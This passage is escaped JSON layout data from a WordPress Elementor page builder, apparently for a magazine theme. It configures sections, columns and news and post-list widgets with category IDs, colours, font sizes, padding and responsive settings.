:\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"fb4g874\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"3\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"78.5\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"400\",\"height\":\"510\",\"category_bg_color\":\"#c9975f\",\"category_bg_hover_color\":\"#c9975f\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"48mal4x\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.960\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"x20xpc5\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"5\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#ea7441\",\"category_bg_hover_color\":\"#ea7441\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"y4m8rgg\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"6\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#e5e100\",\"category_bg_hover_color\":\"#e5e100\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_color1\":\"rgba(255,255,255,0.5)\",\"post_icon_color2\":\"rgba(255,255,255,0.5)\",\"post_icon_size\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"pzcs9rp\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"content_width\":{\"unit\":\"px\",\"size\":\"1170\"},\"gap\":\"no\",\"structure\":\"20\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":0,\"bottom\":\"50\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"gifizg0\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":\"65.004\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"in485g7\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"structure\":\"20\",\"section_sticky_element\":\"\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"sqh26zs\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":\"48.082\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"ni7iq5b\",\"elType\":\"widget\",\"settings\":{\"section_magzma_post_list\":\"\",\"posts_per_page\":\"1\",\"category\":[\"8\"],\"loop_infinite_class\":\"loop-infinte-list-1\",\"section_magzma_post_list_1_typhography_title\":\"\",\"post_icon_size_post_list_1_tablet\":{\"unit\":\"px\",\"size\":18},\"post_icon_size_post_list_1_mobile\":{\"unit\":\"px\",\"size\":18},\"post_icon_padding_post_list_1_tablet\":{\"unit\":\"px\",\"size\":10},\"post_icon_padding_post_list_1_mobile\":{\"unit\":\"px\",\"size\":10},\"post_list_1_view_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_view_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_view_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"post_list_1_view_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"post_list_1_view_font_weight_tablet\":\"600\",\"post_list_1_view_font_weight_mobile\":\"600\",\"typhography_category_post_list_1_background_color\":\"#385c7b\",\"post_list1_category_background_hov_color\":\"#385c7b\",\"post_list_1_category_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_category_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_category_font_size_tablet\":{\"unit\":\"px\",\"size\":12},\"post_list_1_category_font_size_mobile\":{\"unit\":\"px\",\"size\":12},\"post_list_1_category_font_weight_tablet\":\"600\",\"post_list_1_category_font_weight_mobile\":\"600\",\"typhography_title_post_list_1_hov_color\":\"#aaaaaa\",\"post_list_1_title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.25},\"post_list_1_title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.25},\"post_list_1_title_font_size\":{\"unit\":\"px\",\"size\":\"24\"},\"post_list_1_title_font_size_tablet\":{\"unit\":\"px\",\"size\":24},\"post_list_1_title_font_size_mobile\":{\"unit\":\"px\",\"size\":24},\"post_list_1_title_font_weight_tablet\":\"600\",\"post_list_1_title_font_weight_mobile\":\"600\",\"post_list1_meta_title_hov_color\":\"#aaaaaa\",\"post_list_1_meta_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"post_list_1_meta_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"post_list_1_meta_font_weight_tablet\":\"600\",\"post_list_1_meta_font_weight_mobile\":\"600\",\"post_list_1_excerpt_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_excerpt_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_excerpt_font_size_tablet\":{\"unit\":\"px\",\"size\":18},\"post_list_1_excerpt_font_size_mobile\":{\"unit\":\"px\",\"size\":18},\"post_list_1_excerpt_word\":\"10\",\"use_read_more_post_list_1\":\"\",\"post_list1_read_more_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list1_read_more_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list1_read_more_font_size_tablet\":{\"unit\":\"px\",\"size\":18},\"post_list1_read_more_font_size_mobile\":{\"unit\":\"px\",\"size\":18},\"post_list1_read_more_font_weight_tablet\":\"400\",\"post_list1_read_more_font_weight_mobile\":\"400\",\"section_magzma_post_list_1_column_control\":\"\",\"horizontal_use\":\"left\",\"width\":\"600\",\"height\":\"395\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_list_style_1_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_list_style_1_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_post_list_animation_control\":\"\",\"animate\":\"fadeIn\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-post-list-1\"}],\"isInner\":true},{\"id\":\"feegelf\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":\"51.918\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[],\"isInner\":true}],\"isInner\":true},{\"id\":\"wnhjaaz\",\"elType\":\"widget\",\"settings\":{\"section_magzma_post_list\":\"\",\"posts_per_page\":\"4\",\"category\":[\"10\"],\"loop_infinite_class\":\"loop-infinte-list-1\",\"section_magzma_post_list_1_typhography_title\":\"\",\"post_icon_color1_post_list_1\":\"rgba(0,0,0,0.5)\",\"post_icon_color2_post_list_1\":\"rgba(0,0,0,0.5)\",\"post_icon_size_post_list_1_tablet\":{\"unit\":\"px\",\"size\":18},\"post_icon_size_post_list_1_mobile\":{\"unit\":\"px\",\"size\":18},\"post_icon_padding_post_list_1_tablet\":{\"unit\":\"px\",\"size\":10},\"post_icon_padding_post_list_1_mobile\":{\"unit\":\"px\",\"size\":10},\"post_list_1_view_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_view_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_view_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"post_list_1_view_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"post_list_1_view_font_weight_tablet\":\"600\",\"post_list_1_view_font_weight_mobile\":\"600\",\"typhography_category_post_list_1_background_color\":\"#00c5b5\",\"post_list1_category_background_hov_color\":\"#00c5b5\",\"post_list_1_category_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_category_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_category_font_size_tablet\":{\"unit\":\"px\",\"size\":12},\"post_list_1_category_font_size_mobile\":{\"unit\":\"px\",\"size\":12},\"post_list_1_category_font_weight_tablet\":\"600\",\"post_list_1_category_font_weight_mobile\":\"600\",\"typhography_title_post_list_1_hov_color\":\"#aaaaaa\",\"post_list_1_title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.25},\"post_list_1_title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.25},\"post_list_1_title_font_size\":{\"unit\":\"px\",\"size\":\"24\"},\"post_list_1_title_font_size_tablet\":{\"unit\":\"px\",\"size\":24},\"post_list_1_title_font_size_mobile\":{\"unit\":\"px\",\"size\":24},\"post_list_1_title_font_weight_tablet\":\"600\",\"post_list_1_title_font_weight_mobile\":\"600\",\"post_list1_meta_title_hov_color\":\"#00c5b5\",\"post_list_1_meta_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"post_list_1_meta_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"post_list_1_meta_font_weight_tablet\":\"600\",\"post_list_1_meta_font_weight_mobile\":\"600\",\"post_list_1_excerpt_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_excerpt_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_excerpt_font_size_tablet\":{\"unit\":\"px\",\"size\":18},\"post_list_1_excerpt_font_size_mobile\":{\"unit\":\"px\",\"size\":18},\"post_list_1_excerpt_word\":\"10\",\"use_read_more_post_list_1\":\"\",\"post_list1_read_more_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list1_read_more_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list1_read_more_font_size_tablet\":{\"unit\":\"px\",\"size\":18},\"post_list1_read_more_font_size_mobile\":{\"unit\":\"px\",\"size\":18},\"post_list1_read_more_font_weight_tablet\":\"400\",\"post_list1_read_more_font_weight_mobile\":\"400\",\"section_magzma_post_list_1_column_control\":\"\",\"horizontal_use\":\"left\",\"width\":\"600\",\"height\":\"395\",\"horizontal_col_select\":\"column-2\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"use_padding\":\"use\",\"padding_size_list_style_1\":{\"unit\":\"px\",\"size\":\"10\"},\"padding_size_list_style_1_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_list_style_1_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_post_list_animation_control\":\"\",\"animate\":\"fadeIn\",\"_section_style\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-5\",\"bottom\":\"0\",\"left\":\"-5\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-post-list-1\"},{\"id\":\"3j25kle\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"structure\":\"20\",\"section_sticky_element\":\"\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"q18cnb8\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"o6ou2yp\",\"elType\":\"widget\",\"settings\":{\"section_magzma_post_list\":\"\",\"posts_per_page\":\"4\",\"offset\":\"1\",\"category\":[\"5\"],\"loop_infinite_class\":\"loop-infinte-list-1\",\"section_magzma_post_list_1_typhography_title\":\"\",\"post_icon_color1_post_list_1\":\"rgba(0,0,0,0.6)\",\"post_icon_color2_post_list_1\":\"rgba(0,0,0,0.6)\",\"post_icon_size_post_list_1_tablet\":{\"unit\":\"px\",\"size\":18},\"post_icon_size_post_list_1_mobile\":{\"unit\":\"px\",\"size\":18},\"post_icon_padding_post_list_1_tablet\":{\"unit\":\"px\",\"size\":10},\"post_icon_padding_post_list_1_mobile\":{\"unit\":\"px\",\"size\":10},\"use_view_post_list_1\":\"\",\"post_list_1_view_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_view_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_view_font_size\":{\"unit\":\"px\",\"size\":\"10\"},\"post_list_1_view_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"post_list_1_view_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"post_list_1_view_font_weight_tablet\":\"600\",\"post_list_1_view_font_weight_mobile\":\"600\",\"typhography_category_post_list_1_background_color\":\"#ea7441\",\"post_list1_category_background_hov_color\":\"#ea7441\",\"post_list_1_category_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_category_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_category_font_size\":{\"unit\":\"px\",\"size\":\"10\"},\"post_list_1_category_font_size_tablet\":{\"unit\":\"px\",\"size\":12},\"post_list_1_category_font_size_mobile\":{\"unit\":\"px\",\"size\":12},\"post_list_1_category_font_weight_tablet\":\"600\",\"post_list_1_category_font_weight_mobile\":\"600\",\"typhography_title_post_list_1_hov_color\":\"#aaaaaa\",\"post_list_1_title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.25},\"post_list_1_title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.25},\"post_list_1_title_font_size\":{\"unit\":\"px\",\"size\":\"14\"},\"post_list_1_title_font_size_tablet\":{\"unit\":\"px\",\"size\":24},\"post_list_1_title_font_size_mobile\":{\"unit\":\"px\",\"size\":24},\"post_list_1_title_font_weight\":\"700\",\"post_list_1_title_font_weight_tablet\":\"600\",\"post_list_1_title_font_weight_mobile\":\"600\",\"use_meta_post_list_1\":\"\",\"post_list1_meta_title_hov_color\":\"#aaaaaa\",\"post_list_1_meta_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"post_list_1_meta_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"post_list_1_meta_font_weight_tablet\":\"600\",\"post_list_1_meta_font_weight_mobile\":\"600\",\"use_excerpt_post_list_1\":\"\",\"post_list_1_excerpt_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_excerpt_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_excerpt_font_size_tablet\":{\"unit\":\"px\",\"size\":18},\"post_list_1_excerpt_font_size_mobile\":{\"unit\":\"px\",\"size\":18},\"post_list_1_excerpt_word\":\"10\",\"use_read_more_post_list_1\":\"\",\"post_list1_read_more_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list1_read_more_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list1_read_more_font_size\":{\"unit\":\"px\",\"size\":\"15\"},\"post_list1_read_more_font_size_tablet\":{\"unit\":\"px\",\"size\":18},\"post_list1_read_more_font_size_mobile\":{\"unit\":\"px\",\"size\":18},\"post_list1_read_more_font_weight_tablet\":\"400\",\"post_list1_read_more_font_weight_mobile\":\"400\",\"section_magzma_post_list_1_column_control\":\"\",\"horizontal_use\":\"left\",\"width\":\"600\",\"height\":\"395\",\"horizontal_col_select\":\"column-2\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"use_padding\":\"use\",\"padding_size_list_style_1\":{\"unit\":\"px\",\"size\":\"10\"},\"padding_size_list_style_1_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_list_style_1_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_post_list_animation_control\":\"\",\"animate\":\"fadeIn\",\"_section_style\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"-15\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-post-list-1\"}],\"isInner\":true},{\"id\":\"wg2jk1s\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"e37o4qh\",\"elType\":\"widget\",\"settings\":{\"section_magzma_post_list\":\"\",\"posts_per_page\":\"1\",\"category\":[\"5\"],\"loop_infinite_class\":\"loop-infinte-list-1\",\"section_magzma_post_list_1_typhography_title\":\"\",\"post_icon_size_post_list_1_tablet\":{\"unit\":\"px\",\"size\":18},\"post_icon_size_post_list_1_mobile\":{\"unit\":\"px\",\"size\":18},\"post_icon_padding_post_list_1_tablet\":{\"unit\":\"px\",\"size\":10},\"post_icon_padding_post_list_1_mobile\":{\"unit\":\"px\",\"size\":10},\"use_view_post_list_1\":\"\",\"post_list_1_view_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_view_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_view_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"post_list_1_view_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"post_list_1_view_font_weight_tablet\":\"600\",\"post_list_1_view_font_weight_mobile\":\"600\",\"typhography_category_post_list_1_background_color\":\"#ea7441\",\"post_list1_category_background_hov_color\":\"#ea7441\",\"post_list_1_category_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_category_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_category_font_size_tablet\":{\"unit\":\"px\",\"size\":12},\"post_list_1_category_font_size_mobile\":{\"unit\":\"px\",\"size\":12},\"post_list_1_category_font_weight_tablet\":\"600\",\"post_list_1_category_font_weight_mobile\":\"600\",\"typhography_title_post_list_1_hov_color\":\"#aaaaaa\",\"post_list_1_title_line_hei